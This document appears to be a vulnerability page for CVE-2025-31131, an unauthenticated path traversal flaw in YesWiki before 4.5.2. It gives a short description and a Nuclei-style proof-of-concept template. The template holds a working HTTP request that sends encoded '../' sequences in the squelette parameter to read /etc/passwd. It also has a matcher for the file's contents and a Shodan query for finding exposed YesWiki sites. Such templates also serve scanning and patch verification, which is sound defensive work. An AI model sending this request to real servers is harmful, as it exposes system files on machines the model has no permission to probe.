漏洞描述
YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
CVE-2025-31131: Yeswiki < 4.5.2 - Unauthenticated Path Traversal
PoC代码[已公开]
id: CVE-2025-31131
info:
name: Yeswiki < 4.5.2 - Unauthenticated Path Traversal
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
remediation: This vulnerability is fixed in 4.5.2.
reference:
- https://github.com/advisories/GHSA-w34w-fvp3-68xm
- https://github.com/YesWiki/yeswiki/commit/f78c915369a60c74ab8f38561ae93a4aaca9b989
- https://github.com/YesWiki/yeswiki/security/advisories/GHSA-w34w-fvp3-68xm
classification:
epss-score: 0.0842
epss-percentile: 0.92001
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2025-31131
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
shodan-query: html:"yeswiki"
tags: cve,cve2025,yeswiki,lfi,vuln
http:
- raw:
- |
GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- YesWiki-main
- type: regex
part: body
regex:
- "root:.*:0:0:"
# digest: 4a0a00473045022100c8d3fac63320c714ebb0e30a76cae6cc5d5fad9dce1dd4d94c9a55340f3d915702206029b7fda100e315abb5ae25a50822243d8765089d23ee701f243a9052d14cc0:922c64590222798bb761d5b6d8e72950